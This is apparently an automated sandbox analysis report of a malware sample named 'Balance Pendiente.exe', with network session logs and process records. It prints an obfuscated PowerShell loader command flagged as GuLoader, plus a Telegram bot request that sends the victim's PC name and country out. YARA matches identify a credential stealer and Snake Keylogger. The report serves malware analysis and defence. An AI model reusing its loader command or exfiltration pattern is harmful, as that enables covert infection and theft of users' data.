Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-02-25 07:27:49 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:49 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104198
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CO4W96OshuKnzN%2F0n4oUjAPv%2FhIv92KDXbrjUsCQsfFK2m3ZLS4ADVcclZ%2F7mfW5Icp1FedQ%2Bx44sz3wxFsBIxstwiWce6ycXq9TDogJtIrFFJy6u1zqSXFtrntuA3H1QmYApK1f"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f99e9a57c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1650&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1706604&cwnd=192&unsent_bytes=0&cid=af8c3f1f62919bd8&ts=150&x=0"
2025-02-25 07:27:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9, Source IP: 192.168.2.4, Source Port: 49887, Destination IP: 104.21.96.1, Destination Port: 443, PID: 5660, Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-02-25 07:27:51 UTC, Bytes transferred: 85, Direction: OUT, Data: GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-02-25 07:27:51 UTC, Bytes transferred: 856, Direction: IN, Data: HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:51 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104200
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7N7HLuM6Z1rUsuZ5TauLHDGbbsLOrYuUNec09LMkENkL02lLfVZW9LdsNZOcZ3UpDPprddMCLp3%2FALR1AiYiub%2BOcm3Ush1utpq6twih08o4Im7i%2FAyeeDyzlaEP%2BrmARuLajft"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f9a96d59de9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1618&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1767554&cwnd=233&unsent_bytes=0&cid=bdb4e3c23f183cc4&ts=149&x=0"
Timestamp: 2025-02-25 07:27:51 UTC, Bytes transferred: 362, Direction: IN, Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 10, Source IP: 192.168.2.4, Source Port: 49899, Destination IP: 104.21.96.1, Destination Port: 443, PID: 5660, Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-02-25 07:27:52 UTC, Bytes transferred: 85, Direction: OUT, Data: GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-02-25 07:27:52 UTC, Bytes transferred: 854, Direction: IN, Data: HTTP/1.1 200 OK
Date: Tue, 25 Feb 2025 07:27:52 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 104201
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Mon, 24 Feb 2025 02:31:11 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYYzejeSOPZBzuSTq9HaPW4n2cc3RwhvBIti%2BlSRBcEMX41X9YDaUXprU85wdwzN5Zvev%2BRa%2BNGMnky7VaGR5sesglIP0cBEvmQ5pn7gFWgYpZV2S8VY6at25FGXLWPcJzeOIM8W"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9175f9b12d99de9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1653&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1751649&cwnd=233&unsent_bytes=0&cid=48c042a8377321e3&ts=145&x=0"
Timestamp: 2025-02-25 07:27:52 UTC, Bytes transferred: 362, Direction: IN, Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11, Source IP: 192.168.2.4, Source Port: 49905, Destination IP: 149.154.167.220, Destination Port: 443, PID: 5660, Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp: 2025-02-25 07:27:53 UTC, Bytes transferred: 349, Direction: OUT, Data: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2025-02-25 07:27:53 UTC, Bytes transferred: 344, Direction: IN, Data: HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 25 Feb 2025 07:27:53 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2025-02-25 07:27:53 UTC, Bytes transferred: 55, Direction: IN, Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 02:26:35
Start date: 25/02/2025
Path: C:\Users\user\Desktop\Balance Pendiente.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Balance Pendiente.exe"
Imagebase: 0x400000
File size: 507'280 bytes
MD5 hash: E70E71A31781B44F850A39693784CE74
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 02:26:37
Start date: 25/02/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
Imagebase: 0xbd0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 2
Start time: 02:26:37
Start date: 25/02/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 02:27:19
Start date: 25/02/2025
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x8e0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false
